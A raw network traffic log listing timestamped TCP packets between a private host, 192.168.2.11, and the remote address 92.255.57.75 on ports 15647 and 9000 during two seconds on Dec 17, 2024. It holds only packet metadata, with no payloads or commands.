Dec 17, 2024 08:40:21.238552094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.238738060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.247014999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.247334003 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.275820971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.276006937 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.276961088 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.276972055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.277029991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.284708023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.284950972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.304719925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.304822922 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.313560009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.313572884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.313694000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.316174030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.316512108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.358314037 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.358716965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.360544920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.361320972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.361337900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.361414909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.368413925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.368432045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.368556023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.397288084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.397309065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.397419930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.424645901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.425529957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.434490919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.434504986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.434613943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.471365929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.471383095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.471564054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.478512049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.488348007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.489202023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.490406036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.490418911 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.490468025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.512967110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.524286985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.527981997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.547362089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.553777933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.555923939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.559655905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.559768915 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.577013969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.596441031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.597038031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.600034952 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.610270977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.611922979 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.630836964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.632978916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.635929108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.654448032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.663146973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.663860083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.667324066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.667428017 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.679594994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.680038929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.696913958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.697243929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.715702057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.715748072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.715861082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.718200922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.718267918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.718669891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.718734026 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.731714964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.731884956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.750787973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.751920938 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.762681007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.762820005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.762998104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.776464939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.787347078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.787517071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.797729969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.797745943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.797856092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.818716049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.824381113 CET	9000	50051	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.824453115 CET	9000	50051	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.824580908 CET	50051	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.824659109 CET	50051	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.835659027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.835906982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.836268902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.836376905 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.836410046 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.839135885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.869189024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.872731924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.875839949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.883759022 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.883935928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.884111881 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.919346094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.919964075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.925777912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.925792933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.925951004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.941730022 CET	50052	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.944844961 CET	9000	50051	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.954447031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.954638004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.956114054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.966665983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.966700077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.966779947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.989113092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.990823984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.990896940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.990952015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.990952015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.007217884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.007230997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.007339954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.032695055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.032928944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.033066988 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.044168949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.063021898 CET	9000	50052	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.063143015 CET	50052	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.063498020 CET	50052	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.064970970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.065217972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.067507029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.067526102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.067604065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.067604065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.075381994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.075824022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.088279009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.099642992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.099766970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.100259066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.100413084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.100474119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.110661030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.146847010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.146944046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.151802063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.151815891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.151871920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.175820112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.183223963 CET	9000	50052	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.187922001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.190478086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.195914030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.221716881 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.221791029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.221920967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.232868910 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.235862970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.272356987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.272484064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.272634029 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.314126968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.338263035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.338388920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.338438034 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.338438034 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.345175028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.345227957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.394005060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.394021034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.394114971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.415721893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.415837049 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.464696884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.464740992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.464842081 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.526973009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.530281067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.577488899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.578046083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.584595919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.584800959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.647068024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.647206068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.647260904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.670037985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.691611052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.698673010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.698740959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.704627037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.704790115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.722630024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.740858078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.748080015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.748387098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.764581919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.767055035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.784204006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.789911985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.790016890 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.790122032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.806910992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.811450005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.811547995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.811584949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.818516970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.818736076 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.824527979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.824762106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.842538118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.842761040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.842797995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.859473944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.860761881 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.860794067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.860955954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.868172884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.872031927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.872360945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.872417927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.872440100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.884531021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.887984991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.904377937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.904920101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.925107956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.926827908 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.927855968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.931504965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.944608927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.947946072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.964327097 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.964582920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.964670897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.964804888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.979331970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.979922056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:22.991935968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:22.995903969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.003748894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.003803968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.003935099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.022161961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.025011063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.027890921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.042198896 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.044994116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.047657013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.047764063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.062501907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.079273939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.084201097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.084397078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.084408998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.084594965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.096524954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.099875927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.116305113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.116367102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.116425037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.116570950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.134900093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.135060072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.135220051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.142049074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.156466007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.157754898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.158827066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.158864021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.158901930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.158936024 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.162503004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.182466030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.182743073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.182941914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.184623003 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.184684992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.184752941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.199187994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.204020023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.204121113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.204243898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.217369080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.225888014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.225948095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.225956917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.237179995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.237344027 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.247273922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.247334957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.247373104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.247447968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.261287928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.261440992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.304131985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.304485083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.308196068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.308295012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.308319092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.321789026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.321825027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.322079897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.324747086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.324805975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.324820042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.325115919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.329227924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.329324007 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.346978903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.347039938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.347103119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.363965988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.364006042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.364042997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.374833107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.374913931 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.393975973 CET	9000	50052	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.394011021 CET	9000	50052	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.394150972 CET	50052	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.394262075 CET	50052	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.424639940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.424752951 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.427383900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.427453995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:23.427567005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:23.427674055 CET	50034	15647	192.168.2.11	92.255.57.75
